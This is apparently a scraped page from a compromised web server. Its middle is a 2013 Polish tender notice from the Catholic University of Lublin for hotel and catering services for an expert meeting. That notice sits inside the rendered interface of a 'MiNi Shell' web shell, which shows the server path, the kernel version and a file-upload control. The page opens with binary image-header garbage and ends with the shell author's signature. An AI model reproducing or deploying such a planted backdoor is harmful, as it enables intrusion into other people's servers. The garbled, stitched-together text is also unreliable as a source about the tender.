JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130508/69487-N-2013.html

<p class="kh_header"><b>Lublin: ŚWIADCZENIE HOTELARSKICH USŁUG NOCLEGOWYCH I RESTAURACYJNYCH W CZASIE SPOTKANIA EKSPERTÓW W RAMACH PROJEKTU  MIGRACJE POWROTOWE- NAUKA I PRAKTYKA</b><br>
<b>Numer ogłoszenia: 69487 - 2013; data zamieszczenia: 08.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Katolicki Uniwersytet Lubelski Jana Pawła II , Al. Racławickie 14, 20-950 Lublin, woj. lubelskie, tel. (81) 445 41 59, faks (81) 445 41 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kul.lublin.pl/admin/dzp/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: kościelna szkoła wyższa o pełnych prawach publicznych szkół wyższych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE HOTELARSKICH USŁUG NOCLEGOWYCH I RESTAURACYJNYCH W CZASIE SPOTKANIA EKSPERTÓW W RAMACH PROJEKTU  MIGRACJE POWROTOWE- NAUKA I PRAKTYKA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie hotelarskich usług noclegowych i restauracyjnych w czasie spotkania ekspertów w Tomaszowie Lubelskim lub w odległości 5 km od Tomaszowa Lubelskiego w terminie 20-21 maja 2013 r. w postaci: noclegu ze śniadaniem oraz wyżywienia tj. przerwy kawowej, kolacji, śniadania, obiadu dla 11 osób w ramach projektu Migracje powrotowe - nauka  i praktyka współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Powrotów Imigrantów na lata 2008 - 2013 jako część programu ogólnego Solidarność i zarządzanie przepływami migracyjnymi. Projekt jest realizowany na podstawie umowy finansowej numer 3-13-EFPI-2011 zawartej pomiędzy Władzą Wdrażającą Programy Europejskie a Katolickim Uniwersytetem Lubelskim Jana Pawła II.
   WARUNKI i WYMAGANIA HOTELARSKICH USŁUG NOCLEGOWYCH:
1.	Wykonawca w ramach realizacji przedmiotu zamówienia zapewni miejsca noclegowe w terminie: 20 - 21 maja 2013 r. dla 11 osób w 2 pokojach 2 - osobowych i 7 pokojach 1 - osobowych. 
2.	W przypadku pokoju dwuosobowego musi być on wyposażony w dwa osobne łóżka. Nie dopuszcza się możliwości stosowania dostawki. 
3.	Miejsce noclegowe będzie dostępne dla gości od godz. 14:00 w poniedziałek 20 maja 2013 r., do godz. 13:00 we wtorek 21 maja 2013 r.
4.	Wykonawca w ramach świadczenia usługi jest zobowiązany do zapewnienia osobnych pokoi dla osób płci żeńskiej i męskiej. 
5.	Zakwaterowanie nastąpi w pokojach, których powierzchnia nie powinna być mniejsza niż powierzchnia określona w Rozporządzeniu Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. (Dz. U. 2006, nr 22, poz. 169 ze zm.) w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie dla pokoi 1, 2 - osobowych w hotelach min. trzy gwiazdkowych, tj. powierzchnia mieszkalna pokoju, nie obejmująca wyodrębnionych w.h.s., przedpokojów, aneksów barowych, loggii itp. wynosi dla pokoju 1-osobowego co najmniej 10 m2 , dla pokoju 2-osobowego - co najmniej 14 m2 .
6.	Minimalne wyposażenie pokoi: łóżko, nocny stolik, biurko lub stół, krzesła, telewizor. Wszystkie pokoje muszą być wyposażone w łazienkę z kabiną prysznicową, WC.
7.	Wykonawca zapewni dostęp do bezpłatnego parkingu.
8.	Wykonawca w zakresie realizacji usługi noclegu zapewnia śniadanie wg standardu obowiązującego w Hotelu.
9.	Wykonawca potwierdza gotowość do realizacji zamówienia.
10.	Wykonawca gwarantuje standard pokoi na poziomie hotelu min. trzygwiazdkowego.
11.	Zamawiający wymaga by usługa noclegu była realizowana w obiekcie spełniającym wymagania Rozporządzenia Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (tekst jedn. Dz. U. z dnia 24 stycznia 2006r. Nr 22 poz. 169) oraz ustawy o usługach turystycznych (DZ. U. 2004, Nr 223, poz. 2268 z późn zm.). 
12.	Odwołanie rezerwacji noclegu bez ponoszenia kosztów ze strony Zamawiającego będzie możliwe dwa dni przed planowaną usługą. Płatność wynagrodzenia dokonana będzie jedynie za faktycznie zrealizowaną usługę tj. rzeczywiście wydane i wykorzystane miejsca noclegowe. 
13.	Wykonawca zobowiązuje się do realizacji usługi o najwyższej jakości i w razie zastrzeżeń do usługi ze strony uczestników dostosuje się do wytycznych Zamawiającego.
14.	Wykonawca zobowiązuje się prawidłowego wystawiania i doręczenia Faktury VAT za realizację zamówienia z 30 - dniowym terminem płatności.
   WARUNKI I WYMAGANIA USŁUGI RESTAURACYJNEJ
  Wykonawca zapewni wyżywienie dla 11 osób w postaci:
I.	Przerwa kawowa, która ma składać się z:
o	napój gorący w postaci kawy czarnej rozpuszczalnej typu 100 Arabica, otrzymywanej z co najmniej 98 ziaren kawy, podany w termosach utrzymujących temperaturę z podajnikiem - z którego przypadać będzie co najmniej 250 ml kawy na 1 osobę 
 napój gorący w postaci herbaty czarnej ekspresowej aromatyzowanej, której składnikiem będzie co najmniej 98% herbaty czarnej, podany w termosach utrzymujących temperaturę podajnikiem - z którego przypadać będzie co najmniej 250 ml kawy na 1 osobę 
cukier w cukiernicach - bez ograniczeń dla wszystkich 
cytryna do herbaty w plasterkach - bez ograniczeń dla wszystkich 
mleczko do kawy, zawartość tłuszczu 3,2  - podane w mleczniku - 50 ml na osobę 
ciasto domowe - typu szarlotka, napoleonka, sernik - 80 g na osobęciastka: kruche, czekoladowe, wafle- 40 g na osobę
napoju zimnego w postaci wody mineralnej niegazowanej/i wody mineralnej gazowanej - 250 ml na 1 osobę w ciągu całego dnia zajęć
Sposób podania: w formie szwedzkiego stołu z zapewnieniem: serwetek, filiżanek, porcelanowych sztućców, patery szklane na ciastka, łyżeczki platerowane, bez dodatkowej obsługi. Serwis będzie znajdował się we wskazanym przez Wykonawcę miejscu spotkania eksperckiego i będzie być gotowy do użytku na godz. 15:00 w dniu 20 maja 2013 r. i będzie dostępny do godziny 19:00 w tym dniu. Przygotowanie przerwy kawowej z produktów własnych Wykonawcy obejmuje: rozłożenie i rozstawienie kawy, herbaty, wody, ciastek oraz udekorowanie stołu obrusem.
II.	Kolacja, która ma składać się z dania głównego podanego na ciepło (150 g), zimnej płyty składającej się z różnych składników (wędlina, sery, warzywa marynowane, warzywa sezonowe, sałatki, pieczywo) w równych proporcjach po 100 g/osobę, napojów: kawa, herbata po 250 ml na osobę oraz cukier, cytryna i mleczko do kawy - bez ograniczeń.
III.	Obiad dwudaniowy w formie gorącego posiłku podawanego w sali restauracyjnej i przygotowanego z produktów własnych Wykonawcy. 
Obiad musi być gotowy do spożycia na godzinę 13:00 w dniu 21 maja 2013 r. i będzie obejmował:
	Zupę na ciepło (typu: z warzywami, rosół, żurek, barszcz czerwony, pomidorowa)- 250 ml wraz z pieczywem na osobę,
	II danie, na które składa się: mięso-ryba (150 g), ziemniaki- ziemniaki pieczone-ryż-kasza-frytki (150 g), surówka (150 g), napój ciepły lub zimny (250 ml).
	Napój zimny w postaci soku pomarańczowego lub jabłkowego 100% bez dodatku cukru podany w dzbankach - z którego przypadać będzie co najmniej po 200 ml na 1 osobę
	napój gorący w postaci kawy czarnej rozpuszczalnej typu 100 Arabica, otrzymywanej z co najmniej 98% ziaren kawy, podany w termosach utrzymujących temperaturę z podajnikiem - z którego przypadać będzie co najmniej 250 ml kawy na 1 osobę 
	 napój gorący w postaci herbaty czarnej ekspresowej aromatyzowanej, której składnikiem będzie co najmniej 98 herbaty czarnej, podany w termosach utrzymujących temperaturę podajnikiem - z którego przypadać będzie co najmniej 250 ml kawy na 1 osobę 
	cukier w cukiernicach - bez ograniczeń dla wszystkich 
	cytryna do herbaty w plasterkach - bez ograniczeń dla wszystkich 
	mleczko do kawy, zawartość tłuszczu 3,2  - podane w mleczniku - 50 ml na osobę 

Sposób podania: wyposażenie niezbędne tzn. obrusy materiałowe, serwetki jednorazowego użytku, serwis porcelanowy, sztućce platerowane, szklanki do napoju, usługi sprzątania i utylizacji pozostałości.

Personel: co najmniej jedna osoba kelner-kelnerka

POZOSTAŁE OBOWIĄZKI WYKONAWCY: 
1.	Przeprowadzić usługi zgodnie z przedmiotem zamówienia i w terminie wykonania usługi wskazanym przez Zamawiającego.
2.	Wykonawca sporządza szczegółowe menu i przekazuje je do akceptacji Zamawiającemu w terminie co najmniej 2 dni roboczych przed planowanym wydarzeniem.
3.	Bezwarunkowo przestrzegać dobrej praktyki higienicznej.
4.	Prowadzić ciągły nadzór nad realizacją usługi.
5.	Na bieżąco informować Zamawiającego o pojawiających się problemach w realizacji usługi.
6.	Wystawić fakturę z rozbiciem na poszczególne pozycje usług tj. wyżywienie (obiad i kolację) i noclegi (w tym śniadanie) w trakcie spotkania ekspertów i w oparciu o kalkulację kosztów wg wzoru przygotowanego przez Zamawiającego.
7.	Ewentualne zmiany liczby osób korzystających z usługi będą zgłoszone na piśmie (faksem, drogą elektroniczną bądź pocztową) w terminie minimum 2 dni przed planowanym pierwotnym terminem wykonania usługi. Płatność za usługę nastąpi na podstawie faktycznej liczby wydanych posiłków.
8.	Przystępując do przetargu Wykonawca oświadcza, że ceny zaoferowane w ofercie przetargowej nie ulegną podwyższeniu przez cały okres obowiązywania umowy.

Dodatkowe informacje:
1.	Warunki płatności: przelew, 30 dni licząc od daty prawidłowego wystawienia i doręczenia faktury.
2.	Usługa będzie świadczona w budynkach Wykonawcy, które są wyposażone w klimatyzację w pomieszczeniu wykonywania usługi
3.	W trakcie pobytu Wykonawca, w ramach ceny usługi, udostępni grupie 11 ekspertów pomieszczenie na spotkanie robocze: wydzieloną salę lub wydzielone miejsce w ramach przestrzeni restauracyjnej wg planu:

20 maja 2013 r.
14:00 przyjazd i zakwaterowanie uczestników
15:00 przerwa kawowa: kawa i ciastko na początek
15:00-19:00 spotkanie robocze wraz z kawą-herbatą
19:00 - Kolacja 
Nocleg
	21 maja 2013 r.
8.00 - śniadanie (wliczone w cenę noclegu)
9.00-13:00 spotkanie robocze wraz z kawą-herbatą
13:00 obiad.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.11.00.00-4, 55.27.00.00-3, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.05.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi w oparciu o metodę 0-1 na zasadzie kwalifikacji spełnia nie spełnia, na podstawie dołączonego do oferty Oświadczenia zgodnie z art. 22 ust. 1 ustawy Pzp, którego wzór stanowi Zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi w oparciu o metodę 0-1 na zasadzie kwalifikacji spełnia nie spełnia, na podstawie dołączonego do oferty Oświadczenia zgodnie z art. 22 ust. 1 ustawy Pzp, którego wzór stanowi Zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi w oparciu o metodę 0-1 na zasadzie kwalifikacji spełnia nie spełnia, na podstawie dołączonego do oferty Oświadczenia zgodnie z art. 22 ust. 1 ustawy Pzp, którego wzór stanowi Zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi w oparciu o metodę 0-1 na zasadzie kwalifikacji spełnia nie spełnia, na podstawie dołączonego do oferty Oświadczenia zgodnie z art. 22 ust. 1 ustawy Pzp, którego wzór stanowi Zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi w oparciu o metodę 0-1 na zasadzie kwalifikacji spełnia nie spełnia, na podstawie dołączonego do oferty Oświadczenia zgodnie z art. 22 ust. 1 ustawy Pzp, którego wzór stanowi Zał. nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kul.lublin.pl/zamowienia-publiczne,1650.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Koordynacji Programów Europejskich Al. Racławickie 14 20-950 Lublin pokój CN 201..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2013 godzina 11:00, miejsce: Dział Koordynacji Programów Europejskich Al. Racławickie 14 20-950 Lublin pokój CN 201..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com